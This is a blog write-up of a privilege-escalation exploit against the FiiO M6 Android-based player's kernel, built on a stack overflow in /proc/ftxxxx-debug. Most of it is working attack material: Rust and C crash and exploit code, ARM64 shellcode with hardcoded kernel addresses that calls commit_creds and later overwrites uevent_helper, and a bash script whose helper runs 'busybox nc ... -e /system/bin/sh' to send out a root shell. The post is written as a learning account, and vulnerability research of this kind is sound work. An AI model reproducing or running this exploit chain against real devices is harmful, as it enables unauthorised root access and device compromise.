Overview:
A little over a month ago, I wrote a blog post detailing how I found a kernel vulnerability in the FiiO M6 Hi-Fi MP3 player. I would recommend reading that post first, but to recap:
- The device is Android-based, running a version 3.18 AArch64 Linux kernel
- The ftxxxx-debug entry in procfs has a write handler which suffers from a straightforward stack overflow. It reads an arbitrary amount of user-controlled data into a fixed-size kernel buffer using the copy_from_user function
Having never done any kernel exploit dev, the thought of turning this bug into a weaponized privilege escalation initially felt out of the picture. However, upon further consideration, I realized this was essentially the “Hello World” of Linux exploitation on a real-world device; if I was gonna find an entry point into the field, this might as well be it. What followed was 30 days filled with reading, learning, and a LOT of waiting for the device to reboot after crashing. The remainder of this post will cover the technical details of the successful exploit, skimming over the extensive trial and error which took place. I may include a part 3 post or video recapping and reflecting on the project and going more in-depth on the learning process.
TL;DR:
The device does not have any stack canaries, so our overflow allows us to directly overwrite the saved x30 return pointer. While SMAP/SMEP are enabled, the kernel stack is marked as executable and KASLR is disabled. At the time of our overflow, register x21 always holds a pointer to somewhere in the kernel stack, which contains our user-controlled data. We can use the gadget blr x21 to jump to custom shellcode included in the overflow payload. Our shellcode performs a “HotPlugEater” attack, in which uevent_helper is overwritten to point to an attacker-controlled script, executing the malicious payload with root permissions. While there are numerous more “standard” ways to achieve the same effect after obtaining control over PC, the inability to do any kernel debugging and the lack of ARM64 Linux kernel exploitation resources presented significant hurdles.
Picking Up Where We Left Off:
Finding the Offset To The Saved Return Pointer:
At the end of the previous post, I released a Crash PoC for the vulnerability. It has been included again below:
use std::fs::OpenOptions;
use std::io::Write;

fn main() {
    // create our long payload
    let buf = vec![0x41u8; 32 * 1024];
    println!("{}", buf.len());

    // open /proc/ftxxxx-debug for writing
    let path = "/proc/ftxxxx-debug";
    let fd = OpenOptions::new().write(true).open(path);
    println!("Writing {:?}", path);

    if let Ok(mut fd) = fd {
        // a single oversized write is enough to trigger the overflow
        let fuzz_size = buf.len();
        let _ = fd.write(&buf[..fuzz_size]);
    }
}
For this proof-of-concept code, I chose an arbitrarily long buffer (32 * 1024 bytes) which I knew would cause a crash. However, after confirming there were no stack canaries, the first step for the exploit was to determine the offset to the saved link register (x30). At the end of each function call in ARM64, this saved value is popped back off the stack into x30. Upon encountering a RET instruction, the program loads the value of x30 into the PC.
To determine the offset, I manually created random payloads and then checked what the PC value was in the kernel crash. After a few attempts, I was able to determine that the offset was 1024 bytes. As such, we can update the crash PoC to have the following payload:
// ... previous code ...
let mut buf = vec![0x41u8; 8 * 128]; // 1024 bytes of junk 0x41s
let mut buf1 = vec![0x42u8; 8]; // 8 bytes of 0x42, overwriting our saved x30 address
buf.append(&mut buf1);
// ... previous code ...
Reviewing the kernel panic now, the PC is filled with our eight 0x42s, indicating that we have successfully found the offset to the saved x30 value and can redirect program execution.
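The offset above was found by hand with random payloads. As an alternative, here is a minimal sketch of a self-describing pattern in which every aligned 8-byte word encodes its own offset, so a single crash is enough to read the offset out of the PC. This is not the method used in this post; the names make_pattern, offset_from_pc and MARKER are hypothetical, and it assumes the panic log reports the loaded PC value unmodified.

```python
import struct

# High 32 bits are filler (0x41s); the low 32 bits carry the word's offset.
MARKER = 0x4141414100000000


def make_pattern(length):
    """Build `length` bytes where each aligned 8-byte word encodes its own offset."""
    if length % 8:
        raise ValueError("length must be a multiple of 8")
    return b"".join(struct.pack("<Q", MARKER | off) for off in range(0, length, 8))


def offset_from_pc(pc):
    """Recover the payload offset from the PC value reported in the panic."""
    if pc & 0xFFFFFFFF00000000 != MARKER:
        raise ValueError("PC does not look like a pattern word")
    return pc & 0xFFFFFFFF


pattern = make_pattern(2048)
# Simulate the kernel loading the word at offset 1024 into PC.
(fake_pc,) = struct.unpack_from("<Q", pattern, 1024)
print(hex(fake_pc), offset_from_pc(fake_pc))
```

Writing the pattern to the procfs entry instead of a block of 0x41s would then put the offset of the saved x30 directly into the crash log.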
Obtaining the Kernel Symbols:
The next step of the process was to obtain kernel symbols. While our shell user does have read permissions to /proc/kallsyms, kptr_restrict is set to 2 and thus all the addresses are shown as 0.
After a bit of digging, I found a GitHub repo dedicated to extracting symbols from ARM64 Android Kernel images. I was able to obtain the firmware for the FiiO M6 directly from their website. Extracting the provided zip file was enough to obtain the kernel image individually. Using it with the script from GitHub, we can dump all the kernel symbols! Since there’s no KASLR, these are static values which we can hardcode into our exploit.
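To make the difference between the two symbol sources concrete, here is a small sketch that parses kallsyms-style text into a lookup table and flags the all-zero case. It assumes the extractor emits the same "address type name" layout as /proc/kallsyms, which may not match the actual tool. The sample lines are illustrative: the two addresses are the ones hardcoded in the shellcode later in this post, while the type letters and the helper names parse_symbols and looks_restricted are assumptions.

```python
def parse_symbols(text):
    """Parse 'address type name' lines into a {name: address} dict."""
    symbols = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3:
            symbols[parts[2]] = int(parts[0], 16)
    return symbols


def looks_restricted(symbols):
    """True when every address is zero, as happens with kptr_restrict=2."""
    return bool(symbols) and all(addr == 0 for addr in symbols.values())


# Illustrative view for an unprivileged user: addresses are hidden.
RESTRICTED = """\
0000000000000000 T commit_creds
0000000000000000 T prepare_kernel_cred
"""

# Illustrative view after extracting symbols from the firmware image offline.
EXTRACTED = """\
ffffffc0000b5ffc T commit_creds
ffffffc0000b6368 T prepare_kernel_cred
"""

print(looks_restricted(parse_symbols(RESTRICTED)))
print(hex(parse_symbols(EXTRACTED)["commit_creds"]))
```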
Kernel Debugging?
Since this was my first kernel exploit ever, I was really hoping to get some form of a debug set-up working. I assumed the contents inside the FiiO firmware package would be enough to get an emulated kernel up and running. However, after a week of attempting, I had made no progress. I am still fairly confident it can be done, but I couldn’t figure it out and didn’t want to spend any more time on it. I switched gears a bit and tried to patch the bootloader to root the device, but this also proved unsuccessful. I decided to proceed with no debugging capabilities, and return only if I couldn’t figure out how to craft an exploit without them.
Exploitation:
Initial Strategy:
Now that we have kernel symbols and the ability to redirect program execution, it’s time to come up with an exploit strategy. After a few days of learning about Linux privesc exploit techniques, I decided that using the classic commit_creds(prepare_kernel_cred(NULL)) path would probably be best. You can learn more about this privesc strategy here but the quick summary is:
- prepare_kernel_cred creates a root-privileged cred when called with a NULL argument
- commit_creds takes a pointer to a cred structure, and sets the current process to have that privilege level
Therefore, commit_creds(prepare_kernel_cred(NULL)) sets the process’s privilege level to root. After that, we just return execution out of kernel mode and back to our userland process.
Surely The Stack Isn’t Executable, Right…?
With our exploit strategy in mind, I set out to write a ROP chain. There are almost no publicly available resources on ARM64 kernel ROP, but I was able to find some useful posts about userland exploitation, such as a post from Perfect Blue and a talk from Billy Ellis.
As the architecture expands in popularity, maybe one day we will see more write-ups on the subject. Today, however, is not that day. About midway through struggling to craft and debug a proper ROP chain, I spotted something interesting. The x21 register pointed to an area on the stack which we could overflow with anything we wrote after overwriting the saved x30 value. For example, we can use the following code:
uint64_t fake_ret_addr = 0x4242424242424242ULL;
uint64_t x21_overflow = 0x4343434343434343ULL;

static int exploit() {
    int fd;
    fd = open("/proc/ftxxxx-debug", O_RDWR);

    unsigned char buf[4096];
    memset(buf, 0x41, 1);
    memset(buf+1, 0x0, 1023);

    uint64_t *chain = (uint64_t *)&buf[1024];
    *chain++ = (uint64_t)fake_ret_addr;   // overwrites the saved x30
    // 12 words of 0x43s written past the saved return address
    for (int i = 0; i < 12; i++) {
        *chain++ = (uint64_t)x21_overflow;
    }

    write(fd, buf, 4096);
    return 0;
}
And now reviewing the crash logs, we can see that x21 holds our 0x43s.
I had been under the assumption that the stack was not executable, but I decided there was no harm putting this belief to the test. I used ropper to find a blr x21 gadget and overwrote the saved x30 with it. This would redirect code execution to the pointer stored in x21.
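For intuition about what the gadget search involves, here is a much simplified sketch: it encodes blr x21 as its 4-byte A64 instruction word and scans a byte blob for aligned matches. It is not how ropper works internally, the toy image is made up rather than real kernel bytes, and it assumes file offset 0 of the image maps to the kernel base address. The names blr_encoding and find_gadgets are hypothetical.

```python
import struct

KERNEL_BASE = 0xFFFFFFC000080000  # base address used in this post


def blr_encoding(reg):
    """A64 encoding of `blr x<reg>` as little-endian bytes."""
    return struct.pack("<I", 0xD63F0000 | (reg << 5))


def find_gadgets(image, needle, base=KERNEL_BASE):
    """Return the address of every 4-byte-aligned occurrence of `needle`."""
    hits = []
    pos = image.find(needle)
    while pos != -1:
        if pos % 4 == 0:
            hits.append(base + pos)
        pos = image.find(needle, pos + 1)
    return hits


# Toy image: two NOPs followed by `blr x21` (not real kernel contents).
toy_image = struct.pack("<III", 0xD503201F, 0xD503201F, 0xD63F02A0)
print(blr_encoding(21).hex())
print([hex(addr) for addr in find_gadgets(toy_image, blr_encoding(21))])
```

The same base-plus-offset arithmetic is what turns an image offset such as 0x1e664 into the absolute gadget address written over the saved x30.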
uint64_t kernel_base = 0xFFFFFFC000080000ULL;
uint64_t blr_x21 = 0x000000000001e664ULL + kernel_base;
// ... previous code ...
uint64_t *chain = (uint64_t *)&buf[1024];
*chain++ = (uint64_t)blr_x21;   // saved x30 now points at the blr x21 gadget
// 24 words of 0x43s following the overwritten return address
for (int i = 0; i < 24; i++) {
    *chain++ = (uint64_t)x21_overflow;
}
If the stack was executable, this address would then be dereferenced and our junk data would be interpreted as code. It at least seemed worth a shot…
We can see above that our PC value and x21 value are the same, indicating that our ROP chain seems to have executed properly. We also get the following line from the end of the kernel panic:
This error message seems to indicate that our 0x43s are being interpreted as valid instructions, but it’s still hard to tell. Maybe the error message is just a fluke?
I changed the entire chain to be NOPs, except the last line, which was still our x21_overflow junk data.
uint64_t nop = 0xd503201fd503201f;
// ... previous code ...
uint64_t *chain = (uint64_t *)&buf[1024];
*chain++ = (uint64_t)blr_x21;
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)nop;
// ... continue chain
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)x21_overflow;
If the code on the stack was actually executing, it would go down the NOP sled before throwing the same error. Furthermore, our PC would now point to a different address than x21, since it successfully executed instructions.
I was honestly in disbelief that this worked. We now have a very simple gadget which reliably allows us to jump to our own shellcode, executing in supervisor mode (EL1).
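A short note on the nop constant used in the chain: A64 instructions are 4 bytes wide, so each 64-bit chain slot holds two of them. The sketch below checks that the 64-bit constant is simply two little-endian copies of the NOP encoding 0xd503201f. The helper name nop_sled is hypothetical.

```python
import struct

NOP = 0xD503201F  # A64 encoding of the NOP instruction


def nop_sled(count):
    """Return `count` NOP instructions as little-endian bytes."""
    return struct.pack("<I", NOP) * count


# One 64-bit chain slot, as written by the exploit.
slot = struct.pack("<Q", 0xD503201FD503201F)
print(slot.hex(), slot == nop_sled(2))
```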
Writing The Shellcode:
The obvious next step was to come up with our shellcode. In order to do that, we need to grab the addresses for both commit_creds and prepare_kernel_cred. After that, we can start putting together some ARM64 assembly:
mov x0, xzr // move 0x0 into x0
mov x2, #0x6368 // mov addr of prepare_kernel_cred into x2
movk x2, #0x000b, lsl #16
movk x2, #0xffc0, lsl #32
movk x2, #0xffff, lsl #48
blr x2 // branch to addr in x2
mov x4, #0x5ffc // mov addr of commit_creds into x4
movk x4, #0x000b, lsl #16
movk x4, #0xffc0, lsl #32
movk x4, #0xffff, lsl #48
blr x4 // branch to addr in x4
...
This code works as follows:
- Move 0x0 into x0. ARM64 specifies that x0 will always hold the first argument when a function is called. We want the argument passed to prepare_kernel_cred to be NULL, which is equivalent to 0x0
- Load the address of prepare_kernel_cred into x2 and branch to it
- The return value of prepare_kernel_cred is a pointer to the newly created credential. ARM64 specifies that all return values will be passed back to the caller in x0. This works out for us, because the next step is to call commit_creds with a pointer to our cred argument in x0. Thus we don’t have to do anything when prepare_kernel_cred returns
- Load the address of commit_creds into x4 and branch to it.
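The mov/movk runs above load a 64-bit address 16 bits at a time. The following sketch, with a hypothetical helper named load_imm64, splits an address into those four chunks and also produces the instruction bytes, using the standard MOVZ and MOVK encodings for 64-bit registers. It always emits all four instructions and makes no attempt to skip zero chunks.

```python
import struct


def load_imm64(reg, value):
    """Return (assembly text, encoded bytes) pairs that load `value` into x<reg>."""
    out = []
    for hw in range(4):
        imm16 = (value >> (16 * hw)) & 0xFFFF
        if hw == 0:
            # MOVZ: write the low 16 bits and zero the rest of the register.
            text = f"mov x{reg}, #0x{imm16:04x}"
            word = 0xD2800000 | (imm16 << 5) | reg
        else:
            # MOVK: write one 16-bit chunk and keep the other bits.
            text = f"movk x{reg}, #0x{imm16:04x}, lsl #{16 * hw}"
            word = 0xF2800000 | (hw << 21) | (imm16 << 5) | reg
        out.append((text, struct.pack("<I", word)))
    return out


# Address of prepare_kernel_cred, as hardcoded in the shellcode above.
for text, encoded in load_imm64(2, 0xFFFFFFC0000B6368):
    print(f"{text:<28} {encoded.hex()}")
```

Running it for x2 reproduces the four assembly lines shown above, which is a quick way to regenerate the sequence when a symbol address changes between firmware versions.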
After this, we need to switch out of supervisor mode and cleanly return to userland. This is where things became significantly less straightforward. A few things need to happen:
- We need to specify what address to return to
- We need to restore the userland stack pointer
- We need to set saved program status registers
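For the third item, here is a minimal sketch of how an SPSR_EL1 value breaks down, assuming the standard AArch64 field layout: mode in bits 3:0, execution state in bit 4, the D/A/I/F mask bits in bits 9:6, and the condition flags in bits 31:28. The helper name decode_spsr is hypothetical and only a few mode encodings are listed.

```python
# Mode field encodings (bits 3:0) for the exception levels relevant here.
EL_MODES = {0b0000: "EL0t", 0b0100: "EL1t", 0b0101: "EL1h"}

# Exception mask bits and their positions.
MASK_BITS = (("D", 9), ("A", 8), ("I", 7), ("F", 6))


def decode_spsr(value):
    """Split a saved program status value into its main fields."""
    return {
        "mode": EL_MODES.get(value & 0xF, "other"),
        "aarch32": bool(value & (1 << 4)),
        "masked": "".join(name for name, bit in MASK_BITS if value & (1 << bit)),
        "nzcv": (value >> 28) & 0xF,
    }


print(decode_spsr(0x0))
print(decode_spsr(0x3C5))
```

A value of 0 describes a return to EL0 in AArch64 state with no exceptions masked, which is the simplest state an ERET back to userland can target.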
The good news is that because x21 consistently holds a pointer into our user-controlled data, we can pass a userland stack pointer and userland return value via our buffer overflow payload.
To debug this, we will compile the above shellcode which doesn’t yet return from supervisor mode. We will make the last instruction 0x41414141, causing a kernel panic and allowing us to dump the register states. Our exploit payload will include a bogus stack pointer and the address of the function we wish to return to. We can then review the kernel panic logs in order to determine the offsets and finish out our shellcode. In all, our exploit functions look as follows:
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>
#include <iostream>
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <spawn.h>

uint64_t kernel_base = 0xFFFFFFC000080000ULL;
uint64_t blr_x21 = 0x000000000001e664ULL + kernel_base;
uint64_t nop = 0xd503201fd503201fULL;   // two A64 NOPs per 64-bit word
uint64_t junk = 0x4242424242424242ULL;

// userland function we want the shellcode to return into
static int win() {
    puts("[+] Returned from supervisor mode\n");
    char *argv[] = { "busybox1.11", "touch", "/data/local/tmp/test.txt", NULL };
    char *envp[] = { NULL };
    puts("[!] Win\n");
    execve("/system/bin/busybox1.11", argv, envp);
    return 0;
}

static int exploit() {
    int fd;
    fd = open("/proc/ftxxxx-debug", O_RDWR);

    unsigned char buf[4096];
    memset(buf, 0x41, 1);
    memset(buf+1, 0x0, 1023);

    // map a fresh region to act as the userland stack
    uint64_t stack_size = 0x1000;
    void *stack_base = mmap(NULL, stack_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0);
    if(stack_base == MAP_FAILED) {
        puts("[!] mmap failed!");
        return -1;
    }
    void *stack_top = (void *)((uint64_t)stack_base + stack_size);

    // note: &stack_top is the address of the local variable that holds the top of the mapping
    printf("[+] Stack Pointer: %llx\n", (unsigned long long)&stack_top);
    printf("[+] win() address: %llx\n", (unsigned long long)&win);

    unsigned char shellcode[] = {
        0xe0, 0x03, 0x1f, 0xaa, 0x02, 0x6d, 0x8c, 0xd2, // mov x0, xzr ; mov x2, #0x6368
        0x62, 0x01, 0xa0, 0xf2, 0x02, 0xf8, 0xdf, 0xf2, // movk x2, lsl #16 ; movk x2, lsl #32
        0xe2, 0xff, 0xff, 0xf2, 0x40, 0x00, 0x3f, 0xd6, // movk x2, lsl #48 ; blr x2
        0x84, 0xff, 0x8b, 0xd2, 0x64, 0x01, 0xa0, 0xf2, // mov x4, #0x5ffc ; movk x4, lsl #16
        0x04, 0xf8, 0xdf, 0xf2, 0xe4, 0xff, 0xff, 0xf2, // movk x4, lsl #32 ; movk x4, lsl #48
        0x80, 0x00, 0x3f, 0xd6,                         // blr x4
        0x41, 0x41, 0x41, 0x41, // Bad Instruction to cause kernel panic
    };

    uint64_t *chain = (uint64_t *)&buf[1024];
    *chain++ = (uint64_t)blr_x21;                // overwrites the saved x30
    *chain++ = (uint64_t)junk;
    *chain++ = (uint64_t)junk;
    *chain++ = (uint64_t)junk;
    *chain++ = ((uint64_t)&win);                 // userland return address
    *chain++ = (uint64_t)((uint64_t)&stack_top); // userland stack pointer
    // 18 words of NOPs pad the chain up to offset 1216
    for (int i = 0; i < 18; i++) {
        *chain++ = (uint64_t)nop;
    }
    memcpy(buf + 1216, shellcode, sizeof(shellcode));

    puts("[+] Ropping to shellcode...");
    write(fd, buf, 1024 + 1216 + sizeof(shellcode));
    return 0;
}

int main() {
    std::cout << "[+] Starting trigger...\n";
    exploit();
    return 0;
}
Running it, we get a kernel panic as expected.
Let’s break down the kernel crash logs. First of all, we see that x0 is equal to 0x0. This is what we want to see - commit_creds returns 0 if it completed execution without issue, so we can take this as an indicator that our shellcode was able to successfully execute. Also note that x21 is equal to 0xffffffc01521fec8.
Scrolling down, the crash dump gives us the data where x21 is currently pointing. Note that data before and after the actual pointer is shown (x21 is pointing at the fec8 line).
We can note that our win() address (0x0000000078942300) is stored at x21 - 0x80. The next 8 bytes are our bogus stack pointer which we mmapped before the payload. With this information, we can finish out our shellcode to return to usermode:
// ... previous code ...
sub x2, x21, #0x80 // store pointer to win address in x2
ldr x1, [x2] // deref pointer into x1. x1 now holds win() address
ldr x4, [x2, #0x08] // deref pointer+0x8 into x4. x4 now holds fake stack pointer
mov x0, xzr // move 0 into x0
MSR SP_EL0, x4 // set EL0 (usermode) stack pointer to x4
MSR ELR_EL1, x1 // set EL1 (kernelmode) return address to x1
MSR SPSR_EL1, x0 // set status regs to 0x0
ERET
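The x21 - 0x80 offset can be cross-checked against the payload layout. The sketch below rebuilds the chain slots from the exploit code and works out where x21 must point within the payload, assuming the payload lands contiguously on the kernel stack and x21 is unchanged between the blr and the crash. The names chain and slot_offset are hypothetical bookkeeping, not part of the exploit.

```python
OFFSET_TO_X30 = 1024  # offset of the saved x30 found earlier
SLOT = 8              # every chain entry is one 64-bit word

# Chain entries in the order the exploit writes them.
chain = ["blr_x21"] + ["junk"] * 3 + ["win", "stack_top"] + ["nop"] * 18


def slot_offset(name):
    """Payload offset of the first chain slot with the given label."""
    return OFFSET_TO_X30 + chain.index(name) * SLOT


win_off = slot_offset("win")              # where the win() address is written
sp_off = slot_offset("stack_top")         # the stack pointer follows it
x21_off = win_off + 0x80                  # win() sits at x21 - 0x80 in the crash dump
first_nop = slot_offset("nop")
shellcode_off = OFFSET_TO_X30 + len(chain) * SLOT

print(win_off, sp_off, x21_off, first_nop, shellcode_off)
```

Under those assumptions x21 lands inside the NOP region, so execution slides forward into the shellcode copied at offset 1216, and the load at [x2, #0x08] picks up the stack pointer slot directly after the win() address.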
Game over, right?
Not quite. We do successfully return from supervisor mode with our elevated privs. However, as soon as we try to make another syscall, the program segfaults. The device itself doesn’t crash, but our program stops running. Because we did elevate our privs on the process itself, we have root for a nanosecond, but we can’t even do anything interesting with it.
I spent over a week trying to debug this issue (which, looking back on it, was way too much time). The segfault almost certainly stemmed from the ugly way the shellcode ERETs back to userspace without taking into account the previous state, the call stack, or any other information. I tried numerous techniques to save / restore the state and jump to different areas of my code, but nothing seemed to work. Being so close to having a root shell, I was reluctant to step back and try a different approach. But after officially running out of ideas, I went back to the drawing board.
Back To The Drawing Board:
To recap, we currently have the following:
- Read, write, and execute primitives in EL1 (supervisor mode)
- The ability to return from supervisor mode without crashing the kernel, but without being able to make another syscall or fork our current process.
With this information, I went to Google and started poking around. I should also shout out some friends in one of my private exploit dev discords who provided a few suggestions. In the end, however, it was a random slidedeck from 2016 which gave the breakthrough.
The HotplugEater Attack:
This presentation by Dong-Hoon You introduced a technique he called the HotplugEater Attack. I have included the relevant slide below:
The idea is as follows:
- The global variable uevent_helper points to a script which the kernel uses on a hotplug event.
- If we can overwrite this variable to point to an attacker controlled script, it will execute with root permissions.
- Simply changing the variable is enough to trigger the kobject_uevent_env function, which will in turn call our malicious script.
Putting It All Together:
We can dump the address of uevent_helper with the Python script we used earlier.
Our new exploit will now work as follows:
1. Create a script in /data/local/tmp/ which we want to execute with root permissions
2. Trigger our overflow on ftxxxx-debug and ROP to our shellcode
3. The shellcode will overwrite uevent_helper with the path to our malicious script in /data/local/tmp, return to usermode, and gracefully exit (by way of segfaulting).
4. After ~10 seconds, the kernel will execute our script
With this in mind, we need to write some new shellcode which performs the actions outlined in point number 3. That shellcode has been included and commented below:
mov x2, #0xc7c8 // move the address of `uevent_helper` into x2
movk x2, #0x00c2, lsl #16
movk x2, #0xffc0, lsl #32
movk x2, #0xffff, lsl #48
mov w3, #'/' // store the value `/data/local/tmp/cmd` byte by byte at x2
strb w3, [x2]
mov w3, #'d'
strb w3, [x2, #1]
mov w3, #'a'
strb w3, [x2, #2]
mov w3, #'t'
strb w3, [x2, #3]
mov w3, #'a'
strb w3, [x2, #4]
mov w3, #'/'
strb w3, [x2, #5]
mov w3, #'l'
strb w3, [x2, #6]
mov w3, #'o'
strb w3, [x2, #7]
mov w3, #'c'
strb w3, [x2, #8]
mov w3, #'a'
strb w3, [x2, #9]
mov w3, #'l'
strb w3, [x2, #10]
mov w3, #'/'
strb w3, [x2, #11]
mov w3, #'t'
strb w3, [x2, #12]
mov w3, #'m'
strb w3, [x2, #13]
mov w3, #'p'
strb w3, [x2, #14]
mov w3, #'/'
strb w3, [x2, #15]
mov w3, #'c'
strb w3, [x2, #16]
mov w3, #'m'
strb w3, [x2, #17]
mov w3, #'d'
strb w3, [x2, #18]
mov x3, xzr // terminate our string with a null byte by moving 0x0 into x3 and storing x3 at x2 + 19
str x3, [x2, #19]
sub x2, x21, #0x80 // ret to our win() function the same way we did in the previous shellcode
ldr x1, [x2]
ldr x4, [x2, #0x08]
mov x0, xzr
MSR SP_EL0, x4
MSR ELR_EL1, x1
MSR SPSR_EL1, x0
ERET
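Writing the path one byte at a time is tedious to maintain by hand, so here is a sketch of a generator for the mov/strb pairs. The helper name store_string is hypothetical. Unlike the shellcode above, which zeroes x3 and stores all eight bytes of it at offset 19, this sketch terminates the string with a single strb of wzr. The 256-byte limit is an assumption about the size of the uevent_helper buffer, based on UEVENT_HELPER_PATH_LEN in mainline kernels.

```python
UEVENT_HELPER_PATH_LEN = 256  # assumed buffer size, taken from mainline kernels


def store_string(path, base_reg="x2", tmp_reg="w3"):
    """Emit assembly lines that write `path` plus a NUL byte at [base_reg]."""
    if len(path) + 1 > UEVENT_HELPER_PATH_LEN:
        raise ValueError("path does not fit in the helper buffer")
    lines = []
    for i, ch in enumerate(path):
        lines.append(f"mov {tmp_reg}, #'{ch}'")
        if i == 0:
            lines.append(f"strb {tmp_reg}, [{base_reg}]")
        else:
            lines.append(f"strb {tmp_reg}, [{base_reg}, #{i}]")
    # Terminate the string with a single zero byte.
    lines.append(f"strb wzr, [{base_reg}, #{len(path)}]")
    return lines


for line in store_string("/data/local/tmp/cmd"):
    print(line)
```

The path /data/local/tmp/cmd is 19 characters long, which is why the terminator in the shellcode is stored at offset 19.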
We can create an exploit bash script which does the following:
#!/system/bin/sh
echo "[+] Creating malicious script at /data/local/tmp/cmd..."
echo "#!/system/bin/sh" > /data/local/tmp/cmd
echo "/system/bin/busybox1.11 nc 127.0.0.1 4444 -e /system/bin/sh" >> /data/local/tmp/cmd
chmod 777 /data/local/tmp/cmd
echo "[+] Starting exploit..."
/data/local/tmp/poc 2>/dev/null
sleep 5
echo "[+] Launching listener..."
echo "[!] Wait for r00t shell..."
/system/bin/busybox1.11 nc -lp 4444
This script will create a new shell script at /data/local/tmp named cmd, which lines up with our shellcode. cmd’s only function is to forward a shell to a localhost listener on port 4444.
The script then runs our exploit code, which will overwrite the uevent_helper variable to point at our cmd file. Finally, we launch a listener on port 4444 waiting for the kernel to execute the cmd file, giving us a root shell.
The full exploit code can be found on my GitHub.
Next Steps:
While this project is pretty much over, the last thing I would love to do is pack the exploit into an APK and give users the ability to root their device.
I also have some other Android-based devices lying around the house, such as the HiSense Touch and the Onyx Pocket 2. This project has been a ton of fun, so maybe I will pick one of those to target in the future.
If you enjoyed this post and want to stay up to date on my future research projects, feel free to give me a follow on Twitter.